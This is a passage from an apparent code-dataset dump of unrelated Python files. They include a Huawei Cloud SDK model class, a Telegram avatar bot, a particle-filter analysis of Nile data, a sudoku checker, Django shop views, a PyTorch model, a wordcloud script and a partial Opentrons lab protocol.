可输入的字符串长度为1~64个字符。\n\n :param name: The name of this ScaleScript.\n :type name: str\n \"\"\"\n self._name = name\n\n @property\n def uri(self):\n \"\"\"Gets the uri of this ScaleScript.\n\n 自定义自动化脚本的路径。设置为OBS桶的路径或虚拟机本地的路径。 - OBS桶的路径:直接手动输入脚本路径。示例:obs://XXX/scale.sh - 虚拟机本地的路径:用户需要输入正确的脚本路径。脚本所在的路径必须以‘/’开头,以.sh结尾。\n\n :return: The uri of this ScaleScript.\n :rtype: str\n \"\"\"\n return self._uri\n\n @uri.setter\n def uri(self, uri):\n \"\"\"Sets the uri of this ScaleScript.\n\n 自定义自动化脚本的路径。设置为OBS桶的路径或虚拟机本地的路径。 - OBS桶的路径:直接手动输入脚本路径。示例:obs://XXX/scale.sh - 虚拟机本地的路径:用户需要输入正确的脚本路径。脚本所在的路径必须以‘/’开头,以.sh结尾。\n\n :param uri: The uri of this ScaleScript.\n :type uri: str\n \"\"\"\n self._uri = uri\n\n @property\n def parameters(self):\n \"\"\"Gets the parameters of this ScaleScript.\n\n 自定义自动化脚本参数。 多个参数间用空格隔开。 可以传入以下系统预定义参数: - ${mrs_scale_node_num}:扩缩容节点数 - ${mrs_scale_type}:扩缩容类型,扩容为scale_out,缩容为scale_in - ${mrs_scale_node_hostnames}:扩缩容的节点主机名称 - ${mrs_scale_node_ips}:扩缩容的节点IP - ${mrs_scale_rule_name}:触发扩缩容的规则名 其他用户自定义参数使用方式与普通shell脚本相同,多个参数中间用空格隔开。\n\n :return: The parameters of this ScaleScript.\n :rtype: str\n \"\"\"\n return self._parameters\n\n @parameters.setter\n def parameters(self, parameters):\n \"\"\"Sets the parameters of this ScaleScript.\n\n 自定义自动化脚本参数。 多个参数间用空格隔开。 可以传入以下系统预定义参数: - ${mrs_scale_node_num}:扩缩容节点数 - ${mrs_scale_type}:扩缩容类型,扩容为scale_out,缩容为scale_in - ${mrs_scale_node_hostnames}:扩缩容的节点主机名称 - ${mrs_scale_node_ips}:扩缩容的节点IP - ${mrs_scale_rule_name}:触发扩缩容的规则名 其他用户自定义参数使用方式与普通shell脚本相同,多个参数中间用空格隔开。\n\n :param parameters: The parameters of this ScaleScript.\n :type parameters: str\n \"\"\"\n self._parameters = parameters\n\n @property\n def nodes(self):\n \"\"\"Gets the nodes of this ScaleScript.\n\n 自定义自动化脚本所执行的节点组名称。\n\n :return: The nodes of this ScaleScript.\n :rtype: list[str]\n \"\"\"\n return self._nodes\n\n @nodes.setter\n def nodes(self, nodes):\n \"\"\"Sets the nodes of this ScaleScript.\n\n 自定义自动化脚本所执行的节点组名称。\n\n :param nodes: The nodes of this ScaleScript.\n :type nodes: list[str]\n \"\"\"\n self._nodes = nodes\n\n @property\n def active_master(self):\n \"\"\"Gets the active_master of this ScaleScript.\n\n 自定义自动化脚本是否只运行在主Master节点上。 缺省值为false,表示自定义自动化脚本可运行在所有Master节点上。\n\n :return: The active_master of this ScaleScript.\n :rtype: bool\n \"\"\"\n return self._active_master\n\n @active_master.setter\n def active_master(self, active_master):\n \"\"\"Sets the active_master of this ScaleScript.\n\n 自定义自动化脚本是否只运行在主Master节点上。 缺省值为false,表示自定义自动化脚本可运行在所有Master节点上。\n\n :param active_master: The active_master of this ScaleScript.\n :type active_master: bool\n \"\"\"\n self._active_master = active_master\n\n @property\n def fail_action(self):\n \"\"\"Gets the fail_action of this ScaleScript.\n\n 自自定义自动化脚本执行失败后,是否继续执行后续脚本和创建集群。 说明: - 建议您在调试阶段设置为“continue”,无论此自定义自动化脚本是否执行成功,则集群都能继续安装和启动。 - 由于缩容成功无法回滚,因此缩容后执行的脚本“fail_action”必须设置为“continue”。 枚举值: - continue:继续执行后续脚本。 - errorout:终止操作。\n\n :return: The fail_action of this ScaleScript.\n :rtype: str\n \"\"\"\n return self._fail_action\n\n @fail_action.setter\n def fail_action(self, fail_action):\n \"\"\"Sets the fail_action of this ScaleScript.\n\n 自自定义自动化脚本执行失败后,是否继续执行后续脚本和创建集群。 说明: - 建议您在调试阶段设置为“continue”,无论此自定义自动化脚本是否执行成功,则集群都能继续安装和启动。 - 由于缩容成功无法回滚,因此缩容后执行的脚本“fail_action”必须设置为“continue”。 枚举值: - continue:继续执行后续脚本。 - errorout:终止操作。\n\n :param fail_action: The fail_action of this ScaleScript.\n :type fail_action: str\n \"\"\"\n self._fail_action = fail_action\n\n @property\n def action_stage(self):\n \"\"\"Gets the action_stage of this ScaleScript.\n\n 脚本执行时机。 枚举值: - before_scale_out:扩容前 - before_scale_in:缩容前 - after_scale_out:扩容后 - after_scale_in:缩容后\n\n :return: The action_stage of this ScaleScript.\n :rtype: str\n \"\"\"\n return self._action_stage\n\n @action_stage.setter\n def action_stage(self, action_stage):\n \"\"\"Sets the action_stage of this ScaleScript.\n\n 脚本执行时机。 枚举值: - before_scale_out:扩容前 - before_scale_in:缩容前 - after_scale_out:扩容后 - after_scale_in:缩容后\n\n :param action_stage: The action_stage of this ScaleScript.\n :type action_stage: str\n \"\"\"\n self._action_stage = action_stage\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ScaleScript):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"huaweicloud-sdk-mrs/huaweicloudsdkmrs/v2/model/scale_script.py","file_name":"scale_script.py","file_ext":"py","file_size_in_byte":12650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42015197","text":"from flask import Flask, request\nimport telegram\nfrom telebot.credentials import bot_token, bot_user_name, URL\nimport re\n\nglobal bot\nglobal TOKEN\nTOKEN = bot_token\nbot = telegram.Bot(token=TOKEN)\n\napp = Flask(__name__)\n\n@app.route('/{}'.format(TOKEN), methods=['POST'])\ndef respond():\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n chat_id = update.message.chat.id\n msg_id = update.message.message_id\n text = update.message.text.encode('utf-8').decode()\n print(\"got text message:\", text)\n\n if text == \"/start\":\n bot_welcome = \"\"\"\n Welcome to CoolAvatar bot, the is using the service from \n http://avatars.adorable.io/ to generate cool looking avatars based on the \n name you enter so please enter a name and the bot will reply\n with an avatar for your name.\n \"\"\"\n bot.sendMessage(chat_id = chat_id, text=bot_welcome, reply_to_message_id=msg_id)\n else:\n try:\n text = re.sub(r\"\\W\", \"_\", text)\n url = \"https://api.adorable.io/avatars/285/{}.png\".format(text.strip())\n bot.sendPhoto(chat_id=chat_id, photo=url, reply_to_message_id = msg_id)\n except Exception:\n bot.sendMessage(chat_id=chat_id, text=\"There was a problem with the name, try again\", reply_to_message_id=msg_id)\n \n return 'ok'\n\n@app.route('/set_webhook', methods=['GET', 'POST'])\ndef set_webhook():\n s = bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=TOKEN))\n if s:\n return \"webhook setup ok\"\n else:\n return \"webhook setup failed\"\n\n@app.route('/')\ndef index():\n return '.'\n\nif __name__ == '__main__':\n app.run(threaded=True)\n\n","sub_path":"telebot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491748474","text":"\n# coding: utf-8\n\n# In[ ]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\npddata=pd.read_csv('Nile.csv')\nprint(pddata.iloc[:,1].head())\npddata.plot(figsize=(12,4))\nplt.show()\ndata=np.array(pddata.iloc[:,1])\n\n\n# ### 非線形・非ガウス状態空間モデル\n# $\n# \\begin{align}\n# x_{t}&=f_{t}(x_{t-1},\\upsilon_{t})\\\\\n# y_{t}&=h_{t}(x_{t},\\omega_{t})\n# \\end{align}\n# $\n\n# In[ ]:\n\nclass ParticleFilter:\n def __init__(self,y,n_particle,upsilon2,omega2):\n self.y=y\n self.length=len(y)\n self.length_of_time=len(y)\n self.n_particle=n_particle\n self.upsilon2=upsilon2\n self.omega2=omega2\n self.filtered_value = np.zeros(self.length)\n print('OK!!')\n \n def init_particle(self):\n # x(i)_0|0\n particles = []\n predicts = []\n init=np.random.uniform(400,1600,self.n_particle)\n particles.append(init)\n predicts.append(init)\n return({'particles':particles,'predicts':predicts})\n \n def get_likelihood(self,ensemble,t):\n #今回は正規分布を仮定\n likelihoodes=(1/np.sqrt(2*np.pi*self.omega2))*np.exp((-1/(2*self.omega2))*((self.y[t]-ensemble[t])**2))\n return(likelihoodes)\n \n def one_predict(self,ensemble,t):\n # x(i)_t|t-1\n noise=np.random.normal(0,np.sqrt(self.upsilon2),self.n_particle)\n predict=ensemble[t]+noise\n return(predict)\n \n def filtering(self,ensemble,t):\n # x(i)_t|t\n likelihood=self.get_likelihood(ensemble,t)\n beta=likelihood/likelihood.sum()\n #print('beta',beta)\n filtering_value=np.sum(beta*ensemble[t])\n return({'beta':beta,'filtering_value':filtering_value})\n \n def resumpling(self,ensemble,weight):\n # sample=np.zeros(self.n_particle)\n # for i in range(self.n_particle):\n # sample[i]=np.random.choice(ensemble,p=weight)\n sample=np.random.choice(ensemble,p=weight,size=self.n_particle)\n return(sample)\n \n def simulate(self,seed=123):\n np.random.seed(seed)\n particles=self.init_particle()['particles']\n predicts=self.init_particle()['predicts']\n filtered_value=np.zeros(self.length)\n filtered_value[0]=np.sum(particles[0])/self.n_particle\n for t in np.arange(1,self.length):\n print(\"\\r calculating... t={}\".format(t), end=\"\")\n #一期先予測\n predicts.append(self.one_predict(particles,t-1))\n #フィルタリング\n filtered=self.filtering(predicts,t-1)\n filtered_value[t]=filtered['filtering_value']\n resumple=self.resumpling(predicts[t-1],filtered['beta'])\n particles.append(resumple)\n return({'particles':particles,'predicts':predicts,'filtered_value':filtered_value})\n\n\n# In[ ]:\n\nmodel=ParticleFilter(data,10000,np.exp(7.3),np.exp(9.63))\n\n\n# In[ ]:\n\nresult=model.simulate()\n\n\n# In[ ]:\n\n#plt.figure(figsize=(20,9))\nfor i in range(len(pddata)):\n if i==0:\n plt.scatter(np.zeros(len(result['particles'][i]))+i,result['particles'][i],s=1,color='red',alpha=0.1,label='particle')\n plt.scatter(np.zeros(len(result['particles'][i]))+i,result['particles'][i],s=1,color='red',alpha=0.1)\nplt.plot(data,color='blue',label='y')\nplt.plot(result['filtered_value'],color='green',label='estimate')\nplt.legend()\nplt.ylim(400,2000)\nplt.title('particles = {}, upsilon2 = {}, omega2 = {}'.format(model.n_particle,model.upsilon2,model.omega2))\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"code/pf.py","file_name":"pf.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121150535","text":"def isValidate(set_line):\n validate = {\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"}\n return set_line == validate\n\n\ndef sudokuCheck(sudoku):\n\n # 가로줄\n for row in sudoku:\n if not isValidate(set(row)):\n return 0\n\n # 세로줄\n zip_sudoku = list(zip(*sudoku))\n for column in zip_sudoku:\n if not isValidate(set(column)):\n return 0\n\n # 3 x 3 을 3개씩 잡아서 검사\n set1 = set()\n set2 = set()\n set3 = set()\n for idx, row in enumerate(sudoku):\n set1.update(row[:3])\n set2.update(row[3:6])\n set3.update(row[6:])\n if idx in [2, 5, 8]:\n if isValidate(set1) and isValidate(set2) and isValidate(set3):\n return 1\n else:\n return 0\n # 다음 3개 하기 전 초기화\n set1 = set()\n set2 = set()\n set3 = set()\n\n\nT = int(input())\n\nfor t in range(1, T+1):\n sudoku = []\n for _ in range(9):\n sudoku.append(input().split())\n\n print(f\"#{t} {sudokuCheck(sudoku)}\")\n","sub_path":"PYTHON/SWEXPERT/익스퍼트미분류/D2/1974_스도쿠_검증/1974_1.py","file_name":"1974_1.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"97767991","text":"from django.shortcuts import render,redirect,get_object_or_404\nfrom .models import signupit,mobile_spec,cart,buy_mobiles\nfrom django.contrib.auth import login,logout\nfrom django.contrib.auth.models import auth,User\n\n# Create your views here.\ndef home(request):\n mobiles=mobile_spec.objects.all()\n print(mobiles)\n return render(request,'ECommerce/homepage.html',{'mobiles':mobiles})\n\ndef signup(request):\n if request.method=='GET':\n return render(request,'ECommerce/signup.html')\n else:\n username=request.POST.get('username')\n password1=request.POST.get('password1')\n password2=request.POST.get('password2')\n email=request.POST.get('email')\n first_name=request.POST.get('first_name')\n last_name=request.POST.get('last_name')\n user=User.objects.create_user(username=username,password=password1,email=email,first_name=first_name,last_name=last_name)\n user.save()\n auth.login(request,user)\n return render(request,'ECommerce/homepage.html')\n\ndef login(request):\n if request.method=='GET':\n return render(request,'ECommerce/login.html')\n else:\n username=request.POST.get('username')\n password=request.POST.get('password1')\n user=auth.authenticate(username=username,password=password)\n if user is not None:\n auth.login(request,user)\n return redirect(home)\n else:\n return render(request,'ECommerce/login.html',{'error':'invalid'})\n\ndef logout(request):\n auth.logout(request)\n return redirect('home')\n\ndef specifications(request,mobile_pk):\n mobile=mobile_spec.objects.filter(pk=mobile_pk)\n return render(request,'ECommerce/specifications.html',{'mobile':mobile})\n\ndef carts(request):\n if request.method=='GET': \n mobiles=cart.objects.filter(user=request.user)\n mlist=[]\n for mobile in mobiles:\n m1=mobile.cart_models.all()\n print('This is m1',m1)\n for m3 in m1:\n print('This is m3: ',m3)\n m2=mobile_spec.objects.all()\n for m in m2:\n print('This is m:',m)\n if m==m3:\n print('matched')\n mlist.append(m)\n print(mlist)\n #if m not in mlist:\n # mlist.insert(m) \n return render(request,'Ecommerce/cart.html',{'mlist':mlist}) \n\ndef add_to_cart(request,addmobile_pk):\n m4=mobile_spec.objects.filter(pk=addmobile_pk)\n print(m4)\n a1=cart(user=request.user)\n a1.save()\n p1=a1.cart_models.set(m4)\n return redirect('home')\n\ndef remove_from_cart(request,remove_mobile_pk):\n if request.method=='POST':\n m5=cart.objects.filter(user=request.user)\n m6=mobile_spec.objects.filter(pk=remove_mobile_pk)\n for m7 in m5: \n m8=m7.cart_models.all()\n for m9 in m8:\n for m10 in m6:\n print('this is m8',m8)\n print('this is m6',m6)\n print('this is m9',m9)\n print('this is m10',m10)\n if m10.model==m9.model:\n print('matched delete it',m7)\n m7.delete()\n return redirect('home')\n\ndef buy_now(request,buy_pk):\n mobile=mobile_spec.objects.filter(pk=buy_pk)\n return render(request,'ECommerce/buy_now.html',{'mobile':mobile})\n\ndef buy(request,order_pk):\n if request.method=='POST':\n m4=mobile_spec.objects.filter(pk=order_pk)\n print(m4)\n quantity1=request.POST.get('quantity')\n address1=request.POST.get('address')\n print('quantity',quantity1)\n print('address',address1)\n order=buy_mobiles(quantity=quantity1,address=address1,user=request.user)\n order.save()\n order1=order.cart_models.set(m4)\n return redirect('home')\n\ndef search(request):\n search=request.POST.get('search')\n m3=mobile_spec.objects.filter(model=search)\n print(m3)\n if m3.exists() :\n print('none')\n return render(request,'ECommerce/homepage.html',{'m3':m3})\n else:\n return render(request,'ECommerce/homepage.html',{'error':'page not found'})\n \n\n\n\n\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72001833","text":"import torch\nfrom torch import nn\n\nimport modules\nfrom datetime import datetime\n\nclass Embeddings(nn.Module):\n def __init__(self, embedding_dim=64):\n super(Embeddings, self).__init__()\n self.embedding_dim = embedding_dim\n self.embeddings_holiday = modules.CharacterEmbeddings(12, embedding_dim)\n self.embeddings_weather = modules.CharacterEmbeddings(11, embedding_dim)\n self.embeddings_weather_detail = modules.CharacterEmbeddings(38, embedding_dim)\n self.embeddings_month = modules.CharacterEmbeddings(12, embedding_dim)\n self.embeddings_dayofweek = modules.CharacterEmbeddings(7, embedding_dim)\n self.embeddings_hour = modules.CharacterEmbeddings(24, embedding_dim)\n\n def forward(self, data_dict):\n embed1 = self.embeddings_holiday.forward(data_dict['code_holiday'])\n embed2 = self.embeddings_weather.forward(data_dict['code_weather'])\n embed3 = self.embeddings_weather_detail.forward(data_dict['code_weather_detail'])\n embed4 = self.embeddings_month.forward(data_dict['code_month'])\n embed5 = self.embeddings_dayofweek.forward(data_dict['code_dayofweek'])\n embed6 = self.embeddings_hour.forward(data_dict['code_hour'])\n return torch.cat([embed1, embed2, embed3, embed4, embed5, embed6], 1)\n\nclass Predictor(nn.Module):\n def __init__(self):\n super(Predictor, self).__init__()\n self.linears = modules.LinearSeq(561, [1024, 128, 64, 32, 16, 6], activation_list=['relu', 'relu', 'relu', 'relu', 'relu', 'logsoftmax'])\n # self.linears = modules.LinearSeq(28, [32, 1], activation_list=['relu', None])\n\n def train(self, x_train, y_train, criterion, optimizer, num_epochs=1000):\n # hparams\n batch_size = 256\n\n # 1. set device\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # device = 'cpu'\n print('device:', device)\n x_train = x_train.to(device)\n y_train = y_train.to(device)\n\n # 2. network to device\n self.to(device)\n\n # 3. loop over epoch\n with torch.autograd.set_detect_anomaly(True):\n for epoch in range(num_epochs):\n start = datetime.now()\n print('---------------\\nEpoch ', epoch + 1, '\\n')\n epoch_loss = .0\n\n num_batches = x_train.size(0) // batch_size\n\n # 3.1 loop over batch\n batch_count = 0\n while True:\n if batch_count < num_batches:\n batch = x_train[batch_size * batch_count: batch_size * (batch_count + 1)]\n labels = y_train[batch_size * batch_count: batch_size * (batch_count + 1)].squeeze()\n else:\n batch = x_train[batch_size * batch_count:]\n labels = y_train[batch_size * batch_count:].squeeze()\n # print('Epoch:', epoch+1, '/', num_epochs, 'Batch:', batch_count, '/', num_batches)\n # 3.1.0 initialize grads\n optimizer.zero_grad()\n\n # 3.1.1 linears\n preds = self.linears.forward(batch)\n\n # 3.1.3 calc batch loss\n loss = criterion(preds, labels)\n\n # 3.1.4 calc grads\n loss.backward(retain_graph=True)\n\n # 3.1.5 update model params\n optimizer.step()\n\n # 3.1.6 add batch loss to epoch loss\n epoch_loss += loss.item() * batch.size(0)\n # print('epoch loss: ', epoch_loss)\n\n batch_count += 1\n if batch_count > num_batches:\n break\n end = datetime.now()\n # 3.2 calc epoch loss\n epoch_loss /= x_train.size(0)\n print('Epoch', epoch + 1, 'average loss:', epoch_loss, 'elapsed:', (end - start).seconds + round(\n (end - start).microseconds / 1000000, 2))\n\n def eval(self, x_test):\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # device = 'cpu'\n self.to(device)\n print('device:', device)\n x_test = x_test.to(device)\n with torch.no_grad():\n preds = self.linears.forward(x_test)\n return preds.max(dim=1)[1] + 1 # returns max index + 1\n\n# class Tacotron2(nn.Module):\n# def __init__(self, *args):\n# super(Tacotron2, self).__init__()\n# self.encoder = tacotron.modules.Encoder(*args)\n# self.attention = tacotron.modules.LocationSensitiveAttention(*args)\n# self.decoder = tacotron.modules.Decoder(*args)\n#\n # def pseudo_train(self, criterion, optimizer, num_epochs=100):\n # # 1. set device\n # device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # print('device:', device)\n #\n # # 2. network to device\n # self.to(device)\n # batch_size = 4\n # max_input_length = 100\n # input_character_indices = torch.randint(0, 30, [3, batch_size, max_input_length])\n # labels = (torch.rand_like(self.decoder.spectrogram_pred),\n # torch.rand_like(self.decoder.spectrogram_length_pred.type(torch.float32)))\n #\n # # 3. loop over epoch\n # with torch.autograd.set_detect_anomaly(True):\n # for epoch in range(num_epochs):\n # print('---------------\\nEpoch ', epoch + 1, '\\n')\n # epoch_loss = .0\n # epoch_correct = 0\n #\n # # 3.1 loop over batch\n # for batch in input_character_indices:\n # # 3.1.0 initialize grads and decoder attributes\n # optimizer.zero_grad()\n # self.decoder.reset(batch_size)\n #\n # # 3.1.1 encoder\n # encoder_output, (encoder_h_n, encoder_c_n) = self.encoder(batch)\n # self.attention.h = encoder_output\n # h_prev_1 = self.decoder.h_prev_1.clone()\n # stop_token_cum = self.decoder.stop_token_cum.clone()\n #\n # # 3.1.2 loop over decoder step\n # for decoder_step in range(self.decoder.max_output_time_length):\n # print('\\n---------------------', 'decoder step: ', decoder_step + 1)\n # context_vector = self.attention.forward(h_prev_1, stop_token_cum)\n # h_prev_1, stop_token_cum = self.decoder.forward(context_vector)\n # if not any(\n # stop_token_cum): # stop decoding if no further prediction is needed for any samples in batch\n # break\n #\n # # 3.1.3 calc batch loss\n # length_pred_norm = self.decoder.spectrogram_length_pred.type(\n # torch.float32) / self.decoder.max_output_time_length\n # preds = (self.decoder.spectrogram_pred, length_pred_norm)\n # loss = criterion(preds, labels)\n #\n # # 3.1.4 calc grads\n # loss.backward()\n #\n # # 3.1.5 update model params\n # optimizer.step()\n #\n # # 3.1.6 add batch loss to epoch loss\n # epoch_loss += loss.item() * batch.size(0)\n #\n # # 3.2 calc epoch loss\n # epoch_loss /= input_character_indices.size(0) * input_character_indices.size(1)\n\n # def train(self, dataloaders_dict, criterion, optimizer, num_epochs=100):\n # # 1. set device\n # device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n # print('device:', device)\n # # 2. network to device\n # self.net.to(device)\n # # 3. loop over epoch\n # for epoch in range(num_epochs):\n # for phase in ['train', 'val']:\n # if phase == 'train':\n # self.net.train()\n # else:\n # self.net.eval()\n #\n # # 5. initialize loss per phase\n # epoch_loss = .0\n # epoch_correct = 0\n #\n # # 7. iterate dataloader\n # for input_character_indices, spectrogram_labels in tqdm(\n # dataloaders_dict[phase]): # dataloader는 자체로 iterable\n # # 8. dataset to device\n # input_character_indices = input_character_indices.to(device)\n # spectrogram_labels = spectrogram_labels.to(device)\n #\n # # 9. initialize grad\n # optimizer.zero_grad()\n #\n # # 10. forward\n # with torch.set_grad_enabled(\n # mode=(phase == 'train')): # enable grad only when training # with + context_manager\n # # Encoder\n # encoder_output, (encoder_h_n, encoder_c_n) = self.encoder.forward(input_character_indices)\n # # Attention&Decoder\n # self.attention.h = encoder_output # attention.h.Size([input length, batch, encoder output units])\n # self.decoder.reset(batch_size)\n # h_prev_1, stop_token_cum = self.decoder.h_prev_1, self.decoder.stop_token_cum # Local variable to speed up\n # for decoder_step in range(self.decoder.max_output_time_length):\n # print('\\n---------------------', 'decoder step: ', decoder_step + 1)\n # context_vector = self.attention.forward(h_prev_1, stop_token_cum)\n # h_prev_1, stop_token_cum = self.decoder.forward(context_vector)\n # if not any(stop_token_cum): # stop decoding if no further prediction is needed for any samples in batch\n # break\n #\n # # Calc loss\n # loss = criterion(self.decoder.spectrogram_pred, spectrogram_labels)\n #\n # # 11. (training)calc grad\n # if phase == 'train':\n # loss.backward()\n # # 12. (training)update parameters\n # optimizer.step()\n #\n # # 13. add loss and correct per minibatch per phase\n # epoch_loss += loss.item() * input_character_indices.size(0)\n #\n # # 14. print epoch summary\n # epoch_loss /= len(dataloaders_dict[phase].dataset) ## len(dataloader): num of datum\n #\n # print('Epoch loss: {:.4f}'.format(epoch_loss))\n\n\n# def checkup():\n# taco = Tacotron2()\n# criterion = tacotron.loss_function.Taco2Loss()\n# optimizer = torch.optim.Adam(taco.parameters())\n# taco.pseudo_train(criterion=criterion,\n# optimizer=optimizer,\n# num_epochs=3)\n#\n#\n# checkup()\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397149640","text":"import jieba\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\n\n#读取文件\ntext = open(r'test.txt','r').read()\n#使用结巴截取单词\nresult_word = jieba.cut(text,cut_all=True)\n#存放截取的单词\nstr = []\n#读取截取的单词并存放到str中\nfor item in result_word:\n if len(item) >= 1 and item != '\\r\\n':\n str.append(item)\n#存放所有的单词-->key:单词、value:单词出现的次数\ndict = {}\n#统计数组中每个单词出现的次数并将其存放到dict字典中\nfor key in str:\n dict[key] = dict.get(key, 0) + 1\nprint(dict)\n#我们需要的模板图片\nalice_coloring = np.array(Image.open(r\"alice_color.png\"))\n#使用wordcloud的WorldCloud\nwc = WordCloud(background_color=\"white\", max_words=2000,mask=alice_coloring,stopwords=STOPWORDS.add(\"said\"), max_font_size=40,random_state=42)\n\nwc.generate_from_frequencies(dict)\nplt.imshow(wc)\nplt.axis(\"off\")\nplt.show()\nwc.to_file(\"result.png\")","sub_path":"test2/8-11/practice9.py","file_name":"practice9.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267737952","text":"import os\n# heroku config:set HEROKU=1\n# so we can run debug mode locally, not on heroku\nIS_HEROKU = os.environ.get('HEROKU') == 1\n\nDEFAULT_OUTPUT_FILE = 'output/data.json'\n\nSITES = ['http://news.yahoo.com/',\n 'https://news.google.com/',\n 'http://www.huffingtonpost.com/',\n 'http://www.cnn.com/',\n 'http://www.nytimes.com/']","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91178954","text":"import uuid\n\nfrom setuptools import setup\nfrom pip.req import parse_requirements\n\nimport versioneer\n\nrequirements = [str(ir.req) for ir in parse_requirements('requirements.txt', session=uuid.uuid1())]\n\nDATA_FILES = [\n 'requirements.txt',\n 'versioneer.py',\n]\n\nTEST_DEPS = [\n 'nose',\n 'nose-parameterized',\n 'mock',\n]\n\nsetup(\n name='pysteam',\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n description='Python library to work with Steam',\n url='http://github.com/scottrice/pysteam',\n author='Scott Rice',\n author_email='',\n license='MIT',\n packages=['pysteam'],\n install_requires=requirements,\n data_files=DATA_FILES,\n dependency_links=[\n ],\n zip_safe=False,\n test_suite='nose.collector',\n tests_require=TEST_DEPS,\n extras_require={'test': TEST_DEPS},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151319865","text":"import os\nimport json\nimport math\n\n\n# metadata\nmetadata = {\n 'protocolName': 'Redo Replacement Picking (Greiner MASTERBLOCK 96 Well \\\nPlate 1000 µL)',\n 'author': 'Nick ',\n 'source': 'Custom Protocol Request',\n 'apiLevel': '2.11'\n}\n\n\ndef run(ctx):\n\n tip_track = True\n\n [input_file, input_file2, tuberack_scan, plate_scan, tuberack_scan2,\n plate_scan2, default_disposal_vol, default_transfer_vol,\n p300_mount] = get_values( # noqa: F821\n 'input_file', 'input_file2', 'tuberack_scan', 'plate_scan',\n 'tuberack_scan2', 'plate_scan2', 'default_disposal_vol',\n 'default_transfer_vol', 'p300_mount')\n\n # load labware\n rack = ctx.load_labware('eurofins_96x2ml_tuberack', '2', 'tuberack')\n\n plates = [ctx.load_labware('greinermasterblock_96_wellplate_1000ul', '4')]\n\n if input_file2:\n plates.append(\n ctx.load_labware('greinermasterblock_96_wellplate_1000ul', '1'))\n\n tips300 = [\n ctx.load_labware('opentrons_96_tiprack_300ul', slot)\n for slot in ['11']]\n\n # pipette\n p300 = ctx.load_instrument('p300_single_gen2', p300_mount,\n tip_racks=tips300)\n\n tip_log = {val: {} for val in ctx.loaded_instruments.values()}\n\n folder_path = '/data/tip_track'\n tip_file_path = folder_path + '/tip_log.json'\n if tip_track and not ctx.is_simulating():\n if os.path.isfile(tip_file_path):\n with open(tip_file_path) as json_file:\n data = json.load(json_file)\n for pip in tip_log:\n if pip.name in data:\n tip_log[pip]['count'] = data[pip.name]\n else:\n tip_log[pip]['count'] = 0\n else:\n for pip in tip_log:\n tip_log[pip]['count'] = 0\n else:\n for pip in tip_log:\n tip_log[pip]['count'] = 0\n\n for pip in tip_log:\n if pip.type == 'multi':\n tip_log[pip]['tips'] = [tip for rack in pip.tip_racks\n for tip in rack.rows()[0]]\n else:\n tip_log[pip]['tips'] = [tip for rack in pip.tip_racks\n for tip in rack.wells()]\n tip_log[pip]['max'] = len(tip_log[pip]['tips'])\n\n def _pick_up(pip, loc=None):\n if tip_log[pip]['count'] == tip_log[pip]['max'] and not loc:\n ctx.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \\\nresuming.')\n pip.reset_tipracks()\n tip_log[pip]['count'] = 0\n if loc:\n pip.pick_up_tip(loc)\n else:\n pip.pick_up_tip(tip_log[pip]['tips'][tip_log[pip]['count']])\n tip_log[pip]['count'] += 1\n\n # check barcode scans (tube, plate)\n 